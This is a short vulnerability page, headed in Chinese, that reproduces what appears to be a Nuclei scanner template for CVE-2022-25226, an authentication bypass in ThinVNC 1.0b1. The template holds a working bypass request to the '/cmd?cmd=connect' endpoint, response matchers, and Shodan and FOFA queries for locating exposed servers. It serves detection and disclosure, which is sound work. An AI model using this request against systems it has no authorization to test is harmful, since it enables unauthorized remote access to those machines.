漏洞描述
ThinVNC version 1.0b1 allows an unauthenticated user to bypass the authentication process via a specific command, potentially leading to unauthorized access and code execution.
CVE-2022-25226: ThinVNC - Authentication Bypass
PoC代码[已公开]
id: CVE-2022-25226
info:
name: ThinVNC - Authentication Bypass
author: ritikchaddha
severity: critical
description: |
ThinVNC version 1.0b1 allows an unauthenticated user to bypass the authentication process via a specific command, potentially leading to unauthorized access and code execution.
impact: |
An attacker can bypass authentication and gain unauthorized access to the ThinVNC server.
remediation: |
Apply the vendor-supplied patch or update to the latest version to mitigate the CVE-2022-25226 vulnerability.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2022-25226
epss-score: 0.77082
epss-percentile: 0.98929
cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: cybelsoft
product: thinvnc
shodan-query: http.favicon.hash:-1414548363
fofa-query: icon_hash="571240285"
tags: cve,cve2022,thinvnc,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/cmd?cmd=connect"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'cmd":"connectStatus'
- 'authStatus":1'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100c7c88331bd37ffa2a6b7a5558a8e10ccff389a3907bd8a644cb2879102bade48022100f393c912d655dade3e716daffc20a2e4cae29716ef65a1eeb37ba4faa394baa7:922c64590222798bb761d5b6d8e72950